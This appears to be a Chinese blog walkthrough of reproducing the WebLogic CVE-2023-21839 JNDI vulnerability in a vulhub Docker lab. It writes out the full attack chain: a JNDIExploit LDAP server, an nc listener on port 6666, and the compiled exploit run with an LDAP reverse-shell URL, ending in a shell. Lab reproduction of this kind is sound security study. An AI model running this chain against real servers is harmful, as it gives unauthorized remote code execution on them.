影响版本
Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0
这里是用的docker下载的vulhub的CVE-2023-21839
靶机和攻击机都是192.168.85.131
docker 启动环境
ocker-compose up -d
![](https://img-blog.csdnimg.cn/19de8bb4c10940f28e6247ccc213f280.png)
然后看一下说明书
vim README.zh-cn.md
![](https://img-blog.csdnimg.cn/ebb2d7c225dc4d81b9b14ef56bd1e7ab.png)
让你访问ip:7001/console
![](https://img-blog.csdnimg.cn/0cdae970f52f45f39dda14338f0f2061.png)
好,开干
1.使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听 (JNDIExploit-1.2-SNAPSHOT.jar自己下载移动到攻击机GitHub - WhiteHSBG/JNDIExploit: 对原版https://github.com/feihong-cs/JNDIExploit 进行了实用化修改)
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.85.131
![](https://img-blog.csdnimg.cn/e308066288924e77b8d620b613715363.png)
2.nc开监听反弹shell
nc -lvnp 6666
![](https://img-blog.csdnimg.cn/b33cfdf550ba422f9413b6d0c4125da9.png)
3.使用工具包
CVE-2023-21839
这里需要go语言进行编译 go版本大于1.19
go build -o CVE-2023-21839 编译
![](https://img-blog.csdnimg.cn/9eb95594274645eeb8f1c1095fce3082.png)
然后执行
./CVE-2023-21839 -ip 192.168.85.131 -port 7001 -ldap ldap://192.168.85.131:1389/Basic/ReverseShell/192.168.85.131/6666
![](https://img-blog.csdnimg.cn/558c47b5255e484695f02e9508a657e2.png)
nc上反弹了一个shell
![](https://img-blog.csdnimg.cn/42f96e5527e54bb5bf9d0331c7f1176d.png)
成功